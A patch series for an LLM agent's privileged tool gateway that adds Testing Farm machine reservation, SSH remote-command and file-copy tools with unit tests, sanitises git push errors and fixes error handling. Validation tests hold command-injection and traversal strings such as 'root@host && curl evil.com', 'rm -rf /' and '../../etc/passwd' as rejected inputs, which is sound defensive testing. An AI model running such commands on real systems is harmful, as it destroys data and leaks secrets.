returns a fake ID without calling the API.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + result = out.result + assert result["id"] == "dry-run-reservation" + assert "Dry run" in result["message"] + assert "RHEL-9.8.0-Nightly" in result["message"] + assert "x86_64" in result["message"] + assert "60m" in result["message"] + + +@pytest.mark.asyncio +async def test_reserve_machine_request_body(monkeypatch): + """Verify the request body structure matches the reserve-system pattern.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + # Clear the cached headers so the monkeypatched env var is picked up + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["path"] = path + captured["body"] = json + return {"id": "req-001"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "arch": "aarch64", + "duration_minutes": 120, + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + + assert captured["path"] == "requests" + body = captured["body"] + + # Top-level test section uses fmf with plan name + assert body["test"] == { + "fmf": { + "url": "https://gitlab.com/testing-farm/tests", + "ref": "main", + "name": "/testing-farm/reserve", + } + } + assert len(body["environments"]) == 1 + + env = body["environments"][0] + assert env["arch"] == "aarch64" + assert env["os"] == {"compose": "RHEL-9.8.0-Nightly"} + + # Duration must be passed as a string + assert env["variables"]["TF_RESERVATION_DURATION"] == "120" + + # SSH key must be the gateway's own key, base64-encoded + expected_b64 = base64.b64encode(GATEWAY_SSH_KEY.encode()).decode() + assert env["secrets"]["TF_RESERVATION_AUTHORIZED_KEYS_BASE64"] == expected_b64 + + # No tmt extra_args in environment — standalone reservation uses test.fmf + assert "tmt" not in env + + # Security group rules allow SSH from anywhere + ingress = env["settings"]["provisioning"]["security_group_rules_ingress"] + assert len(ingress) == 1 + assert ingress[0]["protocol"] == "tcp" + assert ingress[0]["port_min"] == 22 + assert ingress[0]["port_max"] == 22 + assert ingress[0]["cidr"] == "0.0.0.0/0" + + # Pipeline timeout must be set + assert body["settings"]["pipeline"]["timeout"] == 720 + + +@pytest.mark.asyncio +async def test_reserve_machine_returns_request_id(monkeypatch): + """The tool returns the request ID from the API response.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_post").and_return( + {"id": "abc-123"} + ).once() + + out = await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + assert out.result == {"id": "abc-123"} + + +@pytest.mark.asyncio +async def test_reserve_machine_default_arch(monkeypatch): + """Default arch is x86_64 when not specified.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["body"] = json + return {"id": "req-002"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + + env = captured["body"]["environments"][0] + assert env["arch"] == "x86_64" + + +@pytest.mark.asyncio +async def test_reserve_machine_ssh_key_encoding(monkeypatch): + """The gateway's SSH key is properly base64-encoded (agent-provided key is ignored).""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["body"] = json + return {"id": "req-003"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + agent_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQ+test user@host" + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "Fedora-41", + "ssh_public_key": agent_key, + } + ) + + stored_b64 = captured["body"]["environments"][0]["secrets"][ + "TF_RESERVATION_AUTHORIZED_KEYS_BASE64" + ] + + # Gateway key is used, not the agent-provided key + decoded = base64.b64decode(stored_b64).decode() + assert decoded == GATEWAY_SSH_KEY + assert decoded != agent_key + + +# -- GetTestingFarmReservationDetailsTool tests -- + + +@pytest.mark.asyncio +async def test_reservation_details_dry_run(monkeypatch): + """DRY_RUN=true returns complete state with dry-run-host.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-dry-001"} + ) + assert out.result == {"state": "complete", "ssh_connection": "root@dry-run-host"} + + +@pytest.mark.asyncio +async def test_reservation_details_running_with_guest(monkeypatch): + """When pipeline.log has guest IP and task #1 started, ssh_connection is extracted.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, + } + + pipeline_log = ( + "some log output\n" + "Guest is ready at root@10.0.0.1\n" + "more output\n" + "execute task #1\n" + ) + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-100" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-100"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} + + +@pytest.mark.asyncio +async def test_reservation_details_pending_then_canceled(monkeypatch): + """When state is pending then transitions to canceled, returns canceled.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-200" + ).and_return({"state": "pending"}).and_return({"state": "canceled"}) + + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-200"} + ) + assert out.result == {"state": "canceled", "ssh_connection": "not-yet-available"} + + +@pytest.mark.asyncio +async def test_reservation_details_running_no_task_then_ready(monkeypatch): + """When task #1 hasn't started on first poll, polls again until ready.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, + } + + log_not_ready = "Guest is ready at root@10.0.0.1\nprovisioning still in progress\n" + log_ready = "Guest is ready at root@10.0.0.1\nexecute task #1\n" + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-300" + ).and_return(api_response) + + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 + ).and_return(flexmock(ok=True, text=log_not_ready)).and_return( + flexmock(ok=True, text=log_ready) + ) + + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-300"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} + + +@pytest.mark.asyncio +async def test_reservation_details_multihost_pattern(monkeypatch): + """Multihost pattern with 'primary address:' is also matched.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/def456"}, + } + + pipeline_log = ( + "[guest1] primary address: 10.0.0.99\n" + "execute task #1\n" + ) + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-400" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/def456/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-400"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.99"} + + +@pytest.mark.asyncio +async def test_reservation_details_multihost_realistic_tag(monkeypatch): + """Multihost pattern with realistic TF tag containing dashes, dots, colons, slashes.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/ghi789"}, + } + + pipeline_log = ( + "[RHEL-10.0-Nightly:x86_64:/testing-farm/reserve] primary address: 10.31.8.81\n" + "execute task #1\n" + ) + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-500" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/ghi789/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-500"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.31.8.81"} + + +# -- CancelTestingFarmRequestTool tests -- + + +@pytest.mark.asyncio +async def test_cancel_request_dry_run(monkeypatch): + """DRY_RUN=true returns cancelled=True with message, no API call.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await CancelTestingFarmRequestTool().run( + input={"request_id": "req-cancel-dry"} + ) + result = out.result + assert result["cancelled"] is True + assert result["request_id"] == "req-cancel-dry" + assert "Dry run" in result["message"] + assert "req-cancel-dry" in result["message"] + + +@pytest.mark.asyncio +async def test_cancel_request_calls_delete(monkeypatch): + """The tool calls _testing_farm_api_delete with the correct path.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( + "requests/req-500" + ).once() + + await CancelTestingFarmRequestTool().run( + input={"request_id": "req-500"} + ) + + +@pytest.mark.asyncio +async def test_cancel_request_returns_confirmation(monkeypatch): + """The tool returns cancelled=True and the request_id.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( + "requests/req-600" + ).once() + + out = await CancelTestingFarmRequestTool().run( + input={"request_id": "req-600"} + ) + assert out.result == {"cancelled": True, "request_id": "req-600"} + + +# -- RunRemoteCommandTool tests -- + + +def _make_fake_process(stdout=b"", stderr=b"", returncode=0): + """Create a mock asyncio subprocess process.""" + proc = MagicMock() + proc.communicate = AsyncMock(return_value=(stdout, stderr)) + proc.returncode = returncode + proc.kill = MagicMock() + proc.wait = AsyncMock() + return proc + + +@pytest.mark.asyncio +async def test_run_remote_command_dry_run(monkeypatch): + """DRY_RUN=true returns fake result without executing SSH.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "uname -r", + } + ) + result = out.result + assert result["stdout"] == "" + assert result["stderr"] == "" + assert result["exit_code"] == 0 + assert "Dry run" in result["message"] + assert "uname -r" in result["message"] + assert "root@10.0.0.1" in result["message"] + + +@pytest.mark.asyncio +async def test_run_remote_command_success(monkeypatch): + """Successful SSH command returns stdout/stderr/exit_code and uses correct SSH args.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process( + stdout=b"5.14.0-362.el9.x86_64\n", + stderr=b"", + returncode=0, + ) + + with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc) as mock_exec: + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "uname -r", + } + ) + + # Verify SSH args include -i for gateway key + mock_exec.assert_called_once_with( + "ssh", + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + "root@10.0.0.1", + "uname -r", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + + result = out.result + assert result["stdout"] == "5.14.0-362.el9.x86_64\n" + assert result["stderr"] == "" + assert result["exit_code"] == 0 + + +@pytest.mark.asyncio +async def test_run_remote_command_nonzero_exit(monkeypatch): + """Non-zero exit code is passed through, not treated as an error.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process( + stdout=b"", + stderr=b"ls: cannot access '/nope': No such file or directory\n", + returncode=1, + ) + + with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc): + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "ls /nope", + } + ) + + result = out.result + assert result["exit_code"] == 1 + assert result["stdout"] == "" + assert "No such file or directory" in result["stderr"] + + +# -- CopyFilesToRemoteTool tests -- + + +@pytest.mark.asyncio +async def test_copy_files_dry_run(monkeypatch): + """DRY_RUN=true returns fake result without executing SSH/SCP.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh", "/tmp/data.txt"], + } + ) + result = out.result + assert result["copied"] is True + assert result["remote_dir"] == "/tmp/reproducer" + assert result["files"] == ["/tmp/test.sh", "/tmp/data.txt"] + assert "Dry run" in result["message"] + assert "root@10.0.0.1" in result["message"] + + +@pytest.mark.asyncio +async def test_copy_files_success(monkeypatch): + """Successful copy runs mkdir then scp, returns correct result.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + mkdir_proc = _make_fake_process(stdout=b"", stderr=b"", returncode=0) + scp_proc = _make_fake_process(stdout=b"", stderr=b"", returncode=0) + + call_count = 0 + + async def fake_create_subprocess_exec(*args, **kwargs): + nonlocal call_count + call_count += 1 + if call_count == 1: + return mkdir_proc + return scp_proc + + with patch("asyncio.create_subprocess_exec", side_effect=fake_create_subprocess_exec) as mock_exec: + out = await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh"], + "remote_dir": "/opt/work", + } + ) + + # Two calls: mkdir and scp + assert mock_exec.call_count == 2 + + # First call: ssh mkdir (with -i for gateway key) + mkdir_call = mock_exec.call_args_list[0] + mkdir_args = mkdir_call[0] + assert mkdir_args[0] == "ssh" + assert str(_SSH_KEY_PATH) in mkdir_args + assert "StrictHostKeyChecking=no" in mkdir_args + assert "root@10.0.0.1" in mkdir_args + assert "mkdir" in mkdir_args + assert "-p" in mkdir_args + assert "/opt/work" in mkdir_args + + # Second call: scp (with -i for gateway key) + scp_call = mock_exec.call_args_list[1] + scp_args = scp_call[0] + assert scp_args[0] == "scp" + assert str(_SSH_KEY_PATH) in scp_args + assert "-r" in scp_args + assert "/tmp/test.sh" in scp_args + assert "root@10.0.0.1:/opt/work" in scp_args + + result = out.result + assert result["copied"] is True + assert result["remote_dir"] == "/opt/work" + assert result["files"] == ["/tmp/test.sh"] + + +# -- Error-path / validation tests -- + + +@pytest.mark.asyncio +async def test_run_remote_command_timeout_kills_process(monkeypatch): + """Timeout triggers proc.kill() and raises ToolError.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process() + fake_proc.communicate = AsyncMock(side_effect=asyncio.TimeoutError) + + with ( + patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc), + pytest.raises(ToolError, match="timed out"), + ): + await RunRemoteCommandTool().run( + input={"ssh_host": "root@10.0.0.1", "command": "sleep 999", "timeout": 5} + ) + + fake_proc.kill.assert_called_once() + fake_proc.wait.assert_awaited_once() + + +@pytest.mark.asyncio +async def test_copy_files_timeout_kills_process(monkeypatch): + """CopyFilesToRemoteTool timeout triggers proc.kill() and raises ToolError.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process() + fake_proc.communicate = AsyncMock(side_effect=asyncio.TimeoutError) + + with ( + patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc), + pytest.raises(ToolError, match="timed out"), + ): + await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh"], + "timeout": 5, + } + ) + + fake_proc.kill.assert_called_once() + fake_proc.wait.assert_awaited_once() + + +@pytest.mark.parametrize("bad_host", [ + "root@host; rm -rf /", + "root@host && curl evil.com", + "user@host|cat /etc/passwd", + "root@", +]) +def test_ssh_host_pattern_rejects_injection(bad_host): + """ssh_host pattern blocks shell metacharacters.""" + with pytest.raises(ValidationError): + CopyFilesToRemoteToolInput( + ssh_host=bad_host, + local_paths=["/tmp/test.sh"], + ) + + +def test_local_paths_guard_rejects_outside_allowed_dirs(): + """local_paths guard rejects paths outside /git-repos/ and /tmp/.""" + with pytest.raises(ValidationError, match="not under an allowed directory"): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/etc/passwd"], + ) + + +def test_local_paths_guard_rejects_traversal(): + """local_paths guard rejects directory traversal attempts.""" + with pytest.raises(ValidationError, match="not under an allowed directory"): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/tmp/../../etc/passwd"], + ) + + +@pytest.mark.parametrize("bad_dir", [ + "/tmp/foo; curl evil.com", + "/tmp/foo && rm -rf /", + "/tmp/$(whoami)", + "/tmp/`id`", +]) +def test_remote_dir_pattern_rejects_injection(bad_dir): + """remote_dir pattern blocks shell metacharacters.""" + with pytest.raises(ValidationError): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/tmp/test.sh"], + remote_dir=bad_dir, + ) + + +@pytest.mark.parametrize("bad_id", [ + "../../admin", + "req-123/../../secrets", + "req 123", + "req;drop", +]) +def test_request_id_pattern_rejects_traversal(bad_id): + """request_id pattern blocks path traversal and special characters.""" + with pytest.raises(ValidationError): + GetTestingFarmReservationDetailsToolInput(request_id=bad_id) + with pytest.raises(ValidationError): + CancelTestingFarmRequestToolInput(request_id=bad_id) + + +@pytest.mark.asyncio +async def test_reservation_details_transient_http_error_retries(monkeypatch): + """Transient 503 during polling is retried instead of aborting.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + mock_response_503 = MagicMock() + mock_response_503.status_code = 503 + + call_count = 0 + + def fake_get(path, params=None): + nonlocal call_count + call_count += 1 + if call_count == 1: + err = requests.HTTPError(response=mock_response_503) + raise err + return {"state": "complete"} + + flexmock(tf_module).should_receive("_testing_farm_api_get").replace_with(fake_get) + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-transient"} + ) + assert out.result["state"] == "complete" + assert call_count == 2 From a207927d6a7ad0d170b67bc7a64d64de30d7cd71 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:26:21 +0200 Subject: [PATCH 07/16] Register Testing Farm and SSH tools in MCP gateway Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gateway.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/ymir/tools/privileged/gateway.py b/ymir/tools/privileged/gateway.py index 1099cb47..e55d7b16 100644 --- a/ymir/tools/privileged/gateway.py +++ b/ymir/tools/privileged/gateway.py @@ -56,8 +56,13 @@ ) from ymir.tools.privileged.maintainer_rules import MaintainerRulesTool from ymir.tools.privileged.testing_farm import ( + CancelTestingFarmRequestTool, + CopyFilesToRemoteTool, GetTestingFarmRequestTool, + GetTestingFarmReservationDetailsTool, ReproduceTestingFarmRequestTool, + ReserveTestingFarmMachineTool, + RunRemoteCommandTool, ) from ymir.tools.privileged.zstream_search import ZStreamSearchTool @@ -143,6 +148,11 @@ def main(): GetErratumBuildNvrTool(options=tool_options), GetTestingFarmRequestTool(options=tool_options), ReproduceTestingFarmRequestTool(options=tool_options), + ReserveTestingFarmMachineTool(options=tool_options), + GetTestingFarmReservationDetailsTool(options=tool_options), + CancelTestingFarmRequestTool(options=tool_options), + RunRemoteCommandTool(options=tool_options), + CopyFilesToRemoteTool(options=tool_options), AddJiraAttachmentsTool(options=tool_options), AddJiraCommentTool(options=tool_options), ChangeJiraStatusTool(options=tool_options), From c5db93b3142d199106eb67e3431bba52584abf43 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:52:46 +0200 Subject: [PATCH 08/16] Fix push_to_remote_repository silent failures and credential leakage Before: push failures returned only "Failed to push to the specified repository" with no detail. Worse, git stderr could contain credential helper output (Authorization headers, Basic auth tokens) which would be logged or returned to the LLM agent verbatim. Fix: capture stderr via subprocess.PIPE + communicate(), filter it through _sanitize_git_stderr (strips lines matching auth-related patterns), and include the sanitized output in the error message. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 53 +++++++++++++++---- .../privileged/tests/unit/test_gitlab.py | 8 +-- 2 files changed, 48 insertions(+), 13 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index bf4e7741..4abc60f0 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -129,6 +129,20 @@ def _get_auth_headers(url: str) -> dict[str, str]: return headers +_SENSITIVE_STDERR_RE = re.compile( + r"authorization|basic\s+[A-Za-z0-9+/=]|token|password|credential", + re.IGNORECASE, +) + + +def _sanitize_git_stderr(text: str) -> str: + """Filter out lines from git stderr that may contain auth credentials.""" + return "\n".join( + line for line in text.splitlines() + if not _SENSITIVE_STDERR_RE.search(line) + ) + + def _get_git_auth_args(repository_url: str) -> list[str]: """Return ``git -c`` args that authenticate via HTTP Basic auth. @@ -514,17 +528,36 @@ async def _run( context: RunContext, ) -> StringToolOutput: repository = tool_input.repository - clone_path = tool_input.clone_path branch = tool_input.branch - force = tool_input.force - auth_args = _get_git_auth_args(repository) - command = ["git", *auth_args, "push", repository, branch] - if force: - command.append("--force") - proc = await asyncio.create_subprocess_exec(command[0], *command[1:], cwd=clone_path) - if await proc.wait(): - raise ToolError("Failed to push to the specified repository") - return StringToolOutput(result=f"Successfully pushed the specified branch to {repository}") + + try: + clone_path = tool_input.clone_path + force = tool_input.force + auth_args = _get_git_auth_args(repository) + command = ["git", *auth_args, "push", repository, branch] + if force: + command.append("--force") + env = _get_mock_git_env() + proc = await asyncio.create_subprocess_exec( + command[0], *command[1:], + cwd=clone_path, + env=env, + stdout=asyncio.subprocess.DEVNULL, + stderr=asyncio.subprocess.PIPE, + ) + _, stderr = await proc.communicate() + if proc.returncode: + stderr_text = stderr.decode(errors="replace").strip() if stderr else "" + safe_stderr = _sanitize_git_stderr(stderr_text) + detail = safe_stderr or f"exit code {proc.returncode} (stderr redacted)" + logger.error("git push failed (exit %d): %s", proc.returncode, detail) + raise ToolError(f"Failed to push to {repository}: {detail}") + return StringToolOutput(result=f"Successfully pushed the specified branch to {repository}") + except ToolError: + raise + except Exception as e: + logger.error(f"Failed to push to repository {repository}: {e}") + raise ToolError(f"Failed to push to repository {repository}: {e}") from e class AddMergeRequestLabelsToolInput(BaseModel): diff --git a/ymir/tools/privileged/tests/unit/test_gitlab.py b/ymir/tools/privileged/tests/unit/test_gitlab.py index 3b7486de..46f58fc7 100644 --- a/ymir/tools/privileged/tests/unit/test_gitlab.py +++ b/ymir/tools/privileged/tests/unit/test_gitlab.py @@ -241,11 +241,13 @@ async def create_subprocess_exec(cmd, *args, **kwargs): assert args[1].endswith(repository.removeprefix("https://")) assert args[2] == branch assert kwargs.get("cwd") == clone_path + assert kwargs.get("stdout") == asyncio.subprocess.DEVNULL + assert kwargs.get("stderr") == asyncio.subprocess.PIPE - async def wait(): - return 0 + async def communicate(): + return (None, b"") - return flexmock(wait=wait) + return flexmock(communicate=communicate, returncode=0) flexmock(asyncio).should_receive("create_subprocess_exec").replace_with(create_subprocess_exec) result = ( From cf133dfea2d274772620ad0a984f3d09866de255 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:53:43 +0200 Subject: [PATCH 09/16] Fix clone_repository failing on non-empty target directory Before: clone_repository unconditionally called mkdir(exist_ok=True) then git clone, which fails with "destination path already exists" if a previous clone attempt left a partial directory behind (e.g. a network failure mid-clone). Fix: for branchless clones (the common path), remove the target directory if it already exists before cloning. The rmtree is guarded by an allowlist of safe parent directories (/git-repos/, /tmp/) to prevent accidental deletion of arbitrary paths. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 4abc60f0..43597237 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -4,6 +4,7 @@ import logging import os import re +import shutil from pathlib import Path from typing import Any from urllib.parse import quote, urlparse @@ -475,9 +476,8 @@ async def _run( auth_args = _get_git_auth_args(repository) git_env = _get_mock_git_env() - clone_path.mkdir(parents=True, exist_ok=True) - if branch: + clone_path.mkdir(parents=True, exist_ok=True) proc = await asyncio.create_subprocess_exec("git", "init", cwd=clone_path, env=git_env) if await proc.wait(): raise ToolError(f"Failed to initialize git repo at {clone_path}") @@ -493,6 +493,17 @@ async def _run( if await proc.wait(): raise ToolError(f"Failed to checkout branch {branch}") else: + if clone_path.exists(): + allowed_parents = { + Path(os.environ.get("GIT_REPO_BASEPATH", "/git-repos")), + Path("/tmp"), # noqa: S108 + } + if not any(clone_path.resolve().is_relative_to(p) for p in allowed_parents): + raise ToolError( + f"Refusing to remove {clone_path}: not under an allowed base directory" + ) + await asyncio.to_thread(shutil.rmtree, clone_path) + clone_path.parent.mkdir(parents=True, exist_ok=True) command = ["git", *auth_args, "clone", repository, str(clone_path)] proc = await asyncio.create_subprocess_exec(command[0], *command[1:], env=git_env) if await proc.wait(): From db7b34f994b3917f884822790c8dba56e8071c47 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:17 +0200 Subject: [PATCH 10/16] Fix ToolError double-wrapping in existing GitLab tools The `except Exception` handlers in 5 tools (AddMergeRequestLabels, AddMergeRequestComment, GetAuthorizedCommentsFromMergeRequest, GetMergeRequestDetails, SearchGitlabProjectMrs) catch ToolError alongside genuine exceptions, wrapping it in a second ToolError and losing the specific error message. Add `except ToolError: raise` before each `except Exception` to preserve the original error. Also remove the stale local `from beeai_framework.tools import ToolError` in SearchGitlabProjectMrsTool in favor of the existing top-level import. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 43597237..02799c25 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -604,6 +604,8 @@ async def _run( return StringToolOutput( result=f"Successfully added labels {labels} to merge request {merge_request_url}" ) + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to add labels to merge request: {e}") from e @@ -638,6 +640,8 @@ async def _run( mr = await _get_merge_request_from_url(merge_request_url) await asyncio.to_thread(mr._raw_pr.notes.create, {"body": comment}) return StringToolOutput(result=f"Successfully added comment to merge request {merge_request_url}") + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to add comment to merge request: {e}") from e @@ -910,6 +914,8 @@ async def _run( try: comments = await _fetch_authorized_comments_from_merge_request_url(merge_request_url) return JSONToolOutput(result=comments) + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to get authorized comments from merge request: {e}") from e @@ -960,6 +966,8 @@ async def _run( comments=[c for c in comments if f"@{username}" in c.message], ) ) + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to get merge request details: {e}") from e @@ -1200,7 +1208,7 @@ async def _run( logger.info("Found %d MR(s) for %s in %s", len(results), search, project) return JSONToolOutput(result=results) + except ToolError: + raise except Exception as e: - from beeai_framework.tools import ToolError - raise ToolError(f"Failed to search MRs in {project}: {e}") from e From 7b8b03d1663a6168fd86b2b6283f75aef1317f63 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:48 +0200 Subject: [PATCH 11/16] Add Testing Farm cleanup middleware for crash recovery Event-based middleware that tracks active Testing Farm reservations during agent runs. If the agent crashes or is interrupted, any reservations left in the tracker are cancelled on cleanup, preventing orphaned machines from burning Testing Farm quota. Listens for tool success/error events and maintains a set of active request IDs, removing them when the agent cancels them normally. Co-Authored-By: Claude Opus 4.6 --- ymir/agents/tf_cleanup_middleware.py | 51 ++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 ymir/agents/tf_cleanup_middleware.py diff --git a/ymir/agents/tf_cleanup_middleware.py b/ymir/agents/tf_cleanup_middleware.py new file mode 100644 index 00000000..e3c22ddc --- /dev/null +++ b/ymir/agents/tf_cleanup_middleware.py @@ -0,0 +1,51 @@ +import logging +import re + +from beeai_framework.context import RunContext, RunMiddlewareProtocol +from beeai_framework.emitter import EventMeta +from beeai_framework.tools.events import ToolSuccessEvent + +from ymir.tools.privileged.testing_farm import _testing_farm_api_delete + +logger = logging.getLogger(__name__) + + +class TFReservationCleanupMiddleware(RunMiddlewareProtocol): + """Track Testing Farm reservations and cancel leaked ones on agent crash.""" + + def __init__(self) -> None: + self._reserved: set[str] = set() + self._cancelled: set[str] = set() + + def bind(self, ctx: RunContext) -> None: + ctx.emitter.on( + re.compile(r"^tool\.reserve_testing_farm_machine\.success$"), + self._on_reserve, + ) + ctx.emitter.on( + re.compile(r"^tool\.cancel_testing_farm_request\.success$"), + self._on_cancel, + ) + + async def _on_reserve(self, event: ToolSuccessEvent, meta: EventMeta) -> None: + request_id = event.output.result.get("id") + if request_id: + self._reserved.add(request_id) + 